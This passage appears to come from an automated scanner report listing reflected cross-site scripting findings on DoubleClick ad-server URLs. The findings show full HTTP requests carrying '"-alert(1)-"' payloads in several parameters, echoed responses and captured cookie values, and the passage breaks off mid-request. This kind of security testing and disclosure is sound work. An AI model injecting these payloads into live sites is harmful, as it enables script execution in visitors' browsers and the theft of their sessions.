GET /adi/N3941.InviteMedia/B5414127.684;sz=300x250;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3Bdd3d96d5de90549c%3B12fb0be7129,0%3B%3B%3B1383521841,yxglANBtDADv8ooAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAKXG-sC8BAAAAAAAAADFjYTQ4NGNjLTc0YmEtMTFlMC1hZDg3LTAwMWIyNDc4M2JjOAA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-1107879511b"-alert(1)-"27fa9528383&campID=80340&crID=110787&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340361? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADv8ooAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBuXyB.4sHClCQE2nLULjPiaSFWBRhOjldZdiMAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D300x250%26s%3D814544%26r%3D0%26_salt%3D518457643%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,1ca484cc-74ba-11e0-ad87-001b24783bc8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:50:28 GMT
Content-Length: 9287

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-1107879511b"-alert(1)-"27fa9528383&campID=80340&crID=110787&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2
...[SNIP]...

6.52. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684 [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.684

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d79bd"-alert(1)-"cf2b07c19b1 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.684;sz=300x250;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3Bdd3d96d5de90549c%3B12fb0be7129,0%3B%3B%3B1383521841,yxglANBtDADv8ooAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAKXG-sC8BAAAAAAAAADFjYTQ4NGNjLTc0YmEtMTFlMC1hZDg3LTAwMWIyNDc4M2JjOAA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-110787&campID=80340&crID=110787&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtmld79bd"-alert(1)-"cf2b07c19b1&redirectURL=;ord=1304340361? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADv8ooAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBuXyB.4sHClCQE2nLULjPiaSFWBRhOjldZdiMAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D300x250%26s%3D814544%26r%3D0%26_salt%3D518457643%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,1ca484cc-74ba-11e0-ad87-001b24783bc8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:51:38 GMT
Content-Length: 9287

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtmld79bd"-alert(1)-"cf2b07c19b1&redirectURL=https%3a%2f%2fwww.thinkorswim.com/tos/suiteFreedom/Asterplosion.tos%3Fa%3DIVM%26%26cid%3DGENRET%3B877237%3B62579852%3B239944841%3B39988934");
var fscUrl = url;
var fscUrlClickTagFound =
...[SNIP]...

6.53. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687 [campID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.687

Issue detail

The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6cf3"-alert(1)-"1cadb0e3ce6 was submitted in the campID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.687;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B1526ca9fe9949c4e%3B12fb0be808e,0%3B%3B%3B3635582231,yxglANBtDADf8ooAAAAAAN8.IwAAAAAAAgAAAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAjoC-sC8BAAAAAAAAADIyZDMzNGNlLTc0YmEtMTFlMC1hZWE0LTAwMWIyNGJlNWQxMgA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-110774&campID=80340c6cf3"-alert(1)-"1cadb0e3ce6&crID=110774&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340365? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADf8ooAAAAAAN8.IwAAAAAAAgAAAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABnNp5tCowHCmEmloj5lSZxaqmNqtyXylPPklthAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D890843952%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,22d334ce-74ba-11e0-aea4-001b24be5d12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:50:51 GMT
Content-Length: 9315

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-110774&campID=80340c6cf3"-alert(1)-"1cadb0e3ce6&crID=110774&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer
...[SNIP]...

6.54. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687 [crID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.687

Issue detail

The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a84e2"-alert(1)-"9a3c17528a7 was submitted in the crID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.687;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B1526ca9fe9949c4e%3B12fb0be808e,0%3B%3B%3B3635582231,yxglANBtDADf8ooAAAAAAN8.IwAAAAAAAgAAAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAjoC-sC8BAAAAAAAAADIyZDMzNGNlLTc0YmEtMTFlMC1hZWE0LTAwMWIyNGJlNWQxMgA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-110774&campID=80340&crID=110774a84e2"-alert(1)-"9a3c17528a7&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340365? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADf8ooAAAAAAN8.IwAAAAAAAgAAAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABnNp5tCowHCmEmloj5lSZxaqmNqtyXylPPklthAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D890843952%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,22d334ce-74ba-11e0-aea4-001b24be5d12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:51:05 GMT
Content-Length: 9315

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
inion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-110774&campID=80340&crID=110774a84e2"-alert(1)-"9a3c17528a7&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%
...[SNIP]...

6.55. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687 [partnerID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.687

Issue detail

The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7d68"-alert(1)-"baa51e6d3e2 was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.687;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B1526ca9fe9949c4e%3B12fb0be808e,0%3B%3B%3B3635582231,yxglANBtDADf8ooAAAAAAN8.IwAAAAAAAgAAAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAjoC-sC8BAAAAAAAAADIyZDMzNGNlLTc0YmEtMTFlMC1hZWE0LTAwMWIyNGJlNWQxMgA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-110774&campID=80340&crID=110774&pubICode=1662910&pub=256078&partnerID=9b7d68"-alert(1)-"baa51e6d3e2&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340365? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADf8ooAAAAAAN8.IwAAAAAAAgAAAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABnNp5tCowHCmEmloj5lSZxaqmNqtyXylPPklthAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D890843952%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,22d334ce-74ba-11e0-aea4-001b24be5d12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:51:36 GMT
Content-Length: 9315

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
emporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-110774&campID=80340&crID=110774&pubICode=1662910&pub=256078&partnerID=9b7d68"-alert(1)-"baa51e6d3e2&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=https%3a%2f%2
...[SNIP]...

6.56. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687 [pub parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.687

Issue detail

The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c938b"-alert(1)-"d1206cc109e was submitted in the pub parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.687;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B1526ca9fe9949c4e%3B12fb0be808e,0%3B%3B%3B3635582231,yxglANBtDADf8ooAAAAAAN8.IwAAAAAAAgAAAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAjoC-sC8BAAAAAAAAADIyZDMzNGNlLTc0YmEtMTFlMC1hZWE0LTAwMWIyNGJlNWQxMgA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-110774&campID=80340&crID=110774&pubICode=1662910&pub=256078c938b"-alert(1)-"d1206cc109e&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340365? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADf8ooAAAAAAN8.IwAAAAAAAgAAAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABnNp5tCowHCmEmloj5lSZxaqmNqtyXylPPklthAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D890843952%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,22d334ce-74ba-11e0-aea4-001b24be5d12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:51:24 GMT
Content-Length: 9315

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
engreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-110774&campID=80340&crID=110774&pubICode=1662910&pub=256078c938b"-alert(1)-"d1206cc109e&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=h
...[SNIP]...

6.57. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687 [pubICode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.687

Issue detail

The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9eff5"-alert(1)-"d3279316554 was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.687;sz=728x90;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3B1526ca9fe9949c4e%3B12fb0be808e,0%3B%3B%3B3635582231,yxglANBtDADf8ooAAAAAAN8.IwAAAAAAAgAAAAYAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAjoC-sC8BAAAAAAAAADIyZDMzNGNlLTc0YmEtMTFlMC1hZWE0LTAwMWIyNGJlNWQxMgA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-110774&campID=80340&crID=110774&pubICode=16629109eff5"-alert(1)-"d3279316554&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340365? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
